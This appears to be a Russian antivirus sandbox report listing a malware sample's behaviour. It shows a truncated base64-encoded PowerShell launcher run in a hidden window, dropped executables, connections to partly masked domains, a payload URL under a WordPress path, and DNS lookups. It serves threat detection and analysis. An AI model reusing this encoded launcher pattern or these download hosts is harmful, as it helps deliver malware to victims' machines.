Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcANAA0ACcAOwAkAGgANgA1ADgAMgAzADkAPQAnAE4ANQAyADIAOQA0ADYANQAnADsAJABOADQAOAAwADAAMQA9ACQAZQBuAHYAOgB1AHMAZQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1948
- %TEMP%\1027890.cvr
- %HOMEPATH%\44.exe
- %HOMEPATH%\44.exe
- 'wi###studio.com':443
- 'ha######rgan.onlyoneif.com':443
- 'vi####estudio.net':80
- 'us###servis.net':443
- http://vi####estudio.net/wp-admin/kncexj504681/
- 'wi###studio.com':443
- 'ha######rgan.onlyoneif.com':443
- 'us###servis.net':443
- DNS ASK wi###studio.com
- DNS ASK ha######rgan.onlyoneif.com
- DNS ASK vi####estudio.net
- DNS ASK mi####velopers.com
- DNS ASK us###servis.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcANAA0ACcAOwAkAGgANgA1ADgAMgAzADkAPQAnAE4ANQAyADIAOQA0ADYANQAnADsAJABOADQAOAAwADAAMQA9ACQAZQBuAHYAOgB1AHMAZQB...' (со скрытым окном)